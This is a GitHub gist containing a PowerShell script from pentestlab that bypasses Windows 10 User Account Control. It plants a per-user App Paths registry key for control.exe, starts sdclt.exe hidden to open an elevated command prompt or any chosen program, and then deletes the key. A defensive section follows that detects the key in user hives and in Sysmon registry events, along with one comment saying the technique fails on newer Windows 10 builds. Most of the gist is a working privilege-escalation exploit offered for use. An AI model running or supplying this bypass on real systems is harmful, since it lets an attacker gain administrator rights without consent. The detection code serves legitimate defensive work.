@netbiosX
Last active May 11, 2021
Bypass UAC via sdclt in Windows 10 systems
<#
.SYNOPSIS
This script can bypass User Account Control (UAC) via sdclt.exe on Windows 10.
Author: @netbiosX
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
 
It creates a registry key in: "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" to perform UAC bypass
and starts an elevated command prompt.
 
.NOTES
Function : SdcltUACBypass
File Name : SdcltUACBypass.ps1
Website : pentestlab.blog
 
.LINK
https://pentestlab.blog/2017/06/09/uac-bypass-sdclt/
https://gist.github.com/netbiosX/54a305a05b979e13d5cdffeba5436bcc
 
.EXAMPLE
 
Open Command Prompt (the default):
SdcltUACBypass
 
Open specific application:
SdcltUACBypass -program "cmd.exe"
#>
function SdcltUACBypass(){
    Param (
        [String]$program = "C:\Windows\System32\cmd.exe" #default
    )

    #Create Registry Structure
    New-Item "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" -Force
    Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" -Name "(default)" -Value $program -Force

    #Start sdclt.exe
    Start-Process "C:\Windows\System32\sdclt.exe" -WindowStyle Hidden

    #Cleanup
    Start-Sleep 3
    Remove-Item "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" -Recurse -Force
}
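
A defender-side check for the registry artefact this script creates, added here as an example and not part of the original gist: it looks for the per-user `App Paths\control.exe` key in loaded user hives and in Sysmon registry events. The function names are hypothetical, and the event query assumes Sysmon is installed and configured to log registry events for this key.

```powershell
# Added defensive example; not code from the gist author.
# The key path is the one the script above writes, relative to a user hive.
$SubKey = 'Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe'

function Find-ControlExeAppPathOverride {
    # Point-in-time check of every loaded user hive (HKEY_USERS\<SID>).
    # The script above deletes the key after about 3 seconds, so this mostly
    # catches interrupted runs or variants that skip the cleanup step.
    Get-ChildItem -Path 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue |
        ForEach-Object {
            $path = "Registry::$($_.Name)\$SubKey"
            if (Test-Path -LiteralPath $path) {
                [pscustomobject]@{
                    Hive    = $_.PSChildName
                    Key     = $path
                    Default = (Get-Item -LiteralPath $path).GetValue('')
                }
            }
        }
}

function Get-ControlExeAppPathRegistryEvent {
    param([int]$MaxEvents = 5000)
    # Assumption: Sysmon is installed and its configuration records registry
    # events (ID 12 key create/delete, ID 13 value set) for this key.
    $filter = @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 12, 13 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $evt  = $_
            $data = @{}
            ([xml]$evt.ToXml()).Event.EventData.Data | ForEach-Object { $data[$_.Name] = $_.'#text' }
            if ($data.TargetObject -like "HKU\*\$SubKey*") {
                [pscustomobject]@{
                    Time    = $evt.TimeCreated
                    EventId = $evt.Id
                    Process = $data.Image
                    Target  = $data.TargetObject
                    Details = $data.Details
                }
            }
        }
}
```

Because the key exists for only a few seconds, the logged registry events are the more reliable signal; any hit is worth reviewing alongside process-creation records where `sdclt.exe` is the parent.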
@ghost ghost commented Apr 15, 2019

doesn't work in new Windows 10 versions
